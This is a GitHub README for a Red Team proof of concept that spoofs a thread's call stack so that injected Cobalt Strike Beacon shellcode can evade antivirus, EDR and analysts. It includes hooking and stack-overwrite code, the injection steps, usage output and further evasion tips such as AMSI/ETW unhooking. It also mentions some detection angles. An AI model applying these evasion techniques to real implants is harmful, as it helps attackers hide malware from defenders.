Uh oh!
There was an error while loading.Please reload this page.
- Notifications
You must be signed in to change notification settings - Fork192
Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.
License
mgeeky/ThreadStackSpoofer
Folders and files
| Name | Name | Last commit message | Last commit date | |
|---|---|---|---|---|
Repository files navigation
A PoC implementation for an advanced in-memory evasion technique that spoofs Thread Call Stack. This technique allows to bypass thread-based memory examination rules and better hide shellcodes while in-process memory.
This is an example implementation forThread Stack Spoofing technique aiming to evade Malware Analysts, AVs and EDRs looking for references to shellcode's frames in an examined thread's call stack.The idea is to hide references to the shellcode on thread's call stack thus masquerading allocations containing malware's code.
Implementation along with myShellcodeFluctuation brings Offensive Security community sample implementations to catch up on the offering made by commercial C2 products, so that we can do no worse in our Red Team toolings. 💪
Current implementation differs heavily to what was originally published.This is because I realised there is a way simpler approach to terminate thread's call stack processal and hide shellcode's related frames by simply writing0 to the return address of the first frame we control:
void WINAPI MySleep(DWORD _dwMilliseconds){ [...] auto overwrite = (PULONG_PTR)_AddressOfReturnAddress(); const auto origReturnAddress = *overwrite; *overwrite = 0; [...] *overwrite = origReturnAddress;}The previous implementation, utilisingStackWalk64 can be accessed in thiscommit c250724.
This implementation is much more stable and works nicely on bothDebug andRelease under two architectures -x64 andx86.
This is how a call stack may look like when it isNOT spoofed:
This in turn, when thread stack spoofing is enabled:
Above we can see that the last frame on our call stack is ourMySleep callback.One can wonder does it immediately brings opportunities new IOCs? Hunting rules can look for threads having call stacks not unwinding into following expected thread entry points located within system libraries:
kernel32!BaseThreadInitThunk+0x14ntdll!RtlUserThreadStart+0x21However the call stack of the spoofed thread may look rather odd at first, a brief examination of my system shown, that there are other threads not unwinding to the above entry points as well:
The above screenshot shows a thread of unmodifiedTotal Commander x64. As we can see, its call stack pretty much resembles our own in terms of initial call stack frames.
Why should we care about carefully faking our call stack when there are processes exhibiting traits that we can simply mimic?
The rough algorithm is following:
- Read shellcode's contents from file.
- Acquire all the necessary function pointers from
dbghelp.dll, callSymInitialize - Hook
kernel32!Sleeppointing back to our callback. - Inject and launch shellcode via
VirtualAlloc+memcpy+CreateThread. The thread should start from ourrunShellcodefunction to avoid having Thread'sStartAddress point into somewhere unexpected and anomalous (such asntdll!RtlUserThreadStart+0x21) - As soon as Beacon attempts to sleep, our
MySleepcallback gets invoked. - We then overwrite last return address on the stack to
0which effectively should finish the call stack. - Finally a call to
::SleepExis made to let the Beacon's sleep while waiting for further communication. - After Sleep is finished, we restore previously saved original function return addresses and execution is resumed.
Function return addresses are scattered all around the thread's stack memory area, pointed to byRBP/EBP register.In order to find them on the stack, we need to firstly collect frame pointers, then dereference them for overwriting:
(the above image was borrowed fromEli Bendersky's post namedStack frame layout on x86-64)
*(PULONG_PTR)(frameAddr + sizeof(void*)) = Fake_Return_Address;Initial implementation ofThreadStackSpoofer did that inwalkCallStack andspoofCallStack functions, however the current implementation shows that these effortsare not required to maintain stealthy call stack.
Use case:
C:\> ThreadStackSpoofer.exe <shellcode> <spoof>Where:
<shellcode>is a path to the shellcode file<spoof>when1ortruewill enable thread stack spoofing and anything else disables it.
Example run that spoofs beacon's thread call stack:
PS D:\dev2\ThreadStackSpoofer> .\x64\Release\ThreadStackSpoofer.exe .\tests\beacon64.bin 1[.] Reading shellcode bytes...[.] Hooking kernel32!Sleep...[.] Injecting shellcode...[+] Shellcode is now running.[>] Original return address: 0x1926747bd51. Finishing call stack...===> MySleep(5000)[<] Restoring original return address...[>] Original return address: 0x1926747bd51. Finishing call stack...===> MySleep(5000)[<] Restoring original return address...[>] Original return address: 0x1926747bd51. Finishing call stack...Look at the code and its implementation, understand the concept and re-implement the concept within your own Shellcode Loaders that you utilise to deliver your Red Team engagements.This is an yet another technique for advanced in-memory evasion that increases your Teams' chances for not getting caught by Anti-Viruses, EDRs and Malware Analysts taking look at your implants.
While developing your advanced shellcode loader, you might also want to implement:
- Process Heap Encryption - take an inspiration from this blog post:Hook Heaps and Live Free - which can let you evade Beacon configuration extractors like
BeaconEye - Change your Beacon's memory pages protection to
RW(fromRX/RWX) and encrypt their contents - usingShellcode Fluctuation technique - right before sleeping (that could evade scanners such asMonetaorpe-sieve) - Clear out any leftovers from Reflective Loader to avoid in-memory signatured detections
- Unhook everything you might have hooked (such as AMSI, ETW, WLDP) before sleeping and then re-hook afterwards.
As it's been pointed out to me, the technique here is notyet truly holding up to its name for being astack spoofer. Since we're merely overwriting return addresses on the thread's stack, we're not spoofing the remaining areas of the stack itself. Moreover we're leaving our call stackunwindable meaking it look anomalous since the system will not be able to properly walk the entire call stack frames chain.
However I'm aware of these shortcomings, at the moment I've left it as is since I cared mostly about evading automated scanners that could iterate over processes, enumerate their threads, walk those threads stacks and pick up on any return address pointing back to a non-image memory (such asSEC_PRIVATE - the one allocated dynamically byVirtuaAlloc and friends). A focused malware analyst would immediately spot the oddity and consider the thread rather unusual, hunting down our implant. More than sure about it. Yet, I don't believe that nowadays automated scanners such as AV/EDR have sorts of heuristics implemented that wouldactually walk each thread's stack to verify whether its un-windable¯\_(ツ)_/¯ .
Surely this project (and commercial implementation found in C2 frameworks) gives AV & EDR vendors arguments to consider implementing appropriate heuristics covering such a novel evasion technique.
In order to improve this technique, one can aim for a trueThread Stack Spoofer by inserting carefully crafted fake stack frames established in an reverse-unwinding process.Read more on this idea below.
Hours-long conversation withnamazso teached me, that in order to aim for a proper thread stack spoofer we would need to reverse x64 call stack unwinding process.Firstly, one needs to carefully acknowledge the stack unwinding process explained in (a) linked below. The system when traverses Thread call stack on x64 architecture will not simply rely on return addresses scattered around the thread's stack, but rather it:
- takes return address
- attempts to identify function containing that address (withRtlLookupFunctionEntry)
- That function returns
RUNTIME_FUNCTION,UNWIND_INFOandUNWIND_CODEstructures. These structures describe where are the function's beginning address, ending address, and where are all the code sequences that modifyRBPorRSP. - System needs to know about all stack & frame pointers modifications that happened in each function across the Call Stack to then virtuallyrollback these changes and virtually restore call stack pointers when a call to the processed call stack frame happened (this is implemented inRtlVirtualUnwind)
- The system processes all
UNWIND_CODEs that examined function exhbits to precisely compute the location of that frame's return address and stack pointer value. - Through this emulation, the System is able to walk down the call stacks chain and effectively "unwind" the call stack.
In order to interfere with this process we wuold need torevert it by having our reverted form ofRtlVirtualUnwind. We would need to iterate over functions defined in a module (let's be itkernel32), scan each function'sUNWIND_CODE codes and closely emulate it backwards (as compared toRtlVirtualUnwind and preciselyRtlpUnwindPrologue) in order to find locations on the stack, where to put our fake return addresses.
namazso mentions the necessity to introduce 3 fake stack frames to nicely stitch the call stack:
- A "desync" frame (consider it as agadget-frame) that unwinds differently compared to the caller of our
MySleep(having differntUWOP- Unwind Operation code). We do this by looking through all functions from a module, looking through their UWOPs, calculating how big the fake frame should be. This frame must have UWOPSdifferent than ourMySleep's caller. - Next frame that we want to find is a function that unwindws by popping into
RBPfrom the stack - basically throughUWOP_PUSH_NONVOLcode. - Third frame we need a function that restores
RSPfromRBPthrough the codeUWOP_SET_FPREG
The restoredRSP must be set with theRSP taken from wherever control flow entered into ourMySleep so that all our frames become hidden, as a result of third gadget unwinding there.
In order to begin the process, one can iterate over executable's.pdata by dereferencingIMAGE_DIRECTORY_ENTRY_EXCEPTION data directory entry.Consider below example:
ULONG_PTR imageBase = (ULONG_PTR)GetModuleHandleA("kernel32"); PIMAGE_NT_HEADERS64 pNthdrs = PIMAGE_NT_HEADERS64(imageBase + PIMAGE_DOS_HEADER(imageBase)->e_lfanew); auto excdir = pNthdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXCEPTION]; if (excdir.Size == 0 || excdir.VirtualAddress == 0) return; auto begin = PRUNTIME_FUNCTION(excdir.VirtualAddress + imageBase); auto end = PRUNTIME_FUNCTION(excdir.VirtualAddress + imageBase + excdir.Size); UNWIND_HISTORY_TABLE mshist = { 0 }; DWORD64 imageBase2 = 0; PRUNTIME_FUNCTION currFrame = RtlLookupFunctionEntry( (DWORD64)caller, &imageBase2, &mshist ); UNWIND_INFO *mySleep = (UNWIND_INFO*)(currFrame->UnwindData + imageBase); UNWIND_CODE myFrameUwop = (UNWIND_CODE)(mySleep->UnwindCodes[0]); log("1. MySleep RIP UWOP: ", myFrameUwop.UnwindOpcode); for (PRUNTIME_FUNCTION it = begin; it < end; ++it) { UNWIND_INFO* unwindData = (UNWIND_INFO*)(it->UnwindData + imageBase); UNWIND_CODE frameUwop = (UNWIND_CODE)(unwindData->UnwindCodes[0]); if (frameUwop.UnwindOpcode != myFrameUwop.UnwindOpcode) { // Found candidate function for a desynch gadget frame } }The process is a bit convoluted, yet boils down to reverting thread's call stack unwinding process by substituting arbitrary stack frames with carefully selected other ones, in a ROP alike approach.
This PoC does not follows replicate this algorithm, because my current understanding allows me to accept the call stack finishing on anEXE-based stack frame and I don't want to overcompliate neither my shellcode loaders nor this PoC. Leaving the exercise of implementing this and sharing publicly to a keen reader. Or maybe I'll sit and have a try on doing this myself given some more spare time :)
More information:
- a)x64 exception handling - Stack Unwinding process explained
- b)Sample implementation of
RtlpUnwindPrologueandRtlVirtualUnwind - c)
.pdatasection - d)another sample implementation of
RtlpUnwindPrologue
If you plan on adding this functionality to your own shellcode loaders / toolings be sure toAVOID unhookingkernel32.dll.An attempt to unhookkernel32 will restore originalSleep functionality preventing our callback from being called.If our callback is not called, the thread will be unable to spoof its own call stack by itself.
If that's what you want to have, than you might need to run another, watchdog thread, making sure that the Beacons thread will get spoofed whenever it sleeps.
If you're using Cobalt Strike and a BOFunhook-bof by Raphael's Mudge, be sure to check out myPull Request that adds optional parameter to the BOF specifying libraries that should not be unhooked.
This way you can maintain your hooks in kernel32:
beacon> unhook kernel32[*] Running unhook. Will skip these modules: wmp.dll, kernel32.dll[+] host called home, sent: 9475 bytes[+] received output:ntdll.dll <.text>Unhook is done.Modifiedunhook-bof with option to ignore specified modules
This PoC was designed to work with Cobalt Strike's Beacon shellcodes. The Beacon is known to call out tokernel32!Sleep to await further instructions from its C2.This loader leverages that fact by hookingSleep in order to perform its housekeeping.
This implementation might not work with other shellcodes in the market (such asMeterpreter) if they don't useSleep to cool down.Since this is merely aProof of Concept showing the technique, I don't intend on adding support for any other C2 framework.
When you understand the concept, surely you'll be able to translate it into your shellcode requirements and adapt the solution for your advantage.
Please do not open Github issues related to "this code doesn't work with XYZ shellcode", they'll be closed immediately.
This and other projects are outcome of sleepless nights andplenty of hard work. If you like what I do and appreciate that I always give back to the community,Consider buying me a coffee(or better a beer) just to say thank you! 💪
Mariusz Banach / mgeeky, 21 <mb [at] binary-offensive.com> (https://github.com/mgeeky)About
Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.
Resources
License
Code of conduct
Uh oh!
There was an error while loading.Please reload this page.
Stars
Watchers
Forks
Sponsor this project
Uh oh!
There was an error while loading.Please reload this page.
Packages0
Uh oh!
There was an error while loading.Please reload this page.



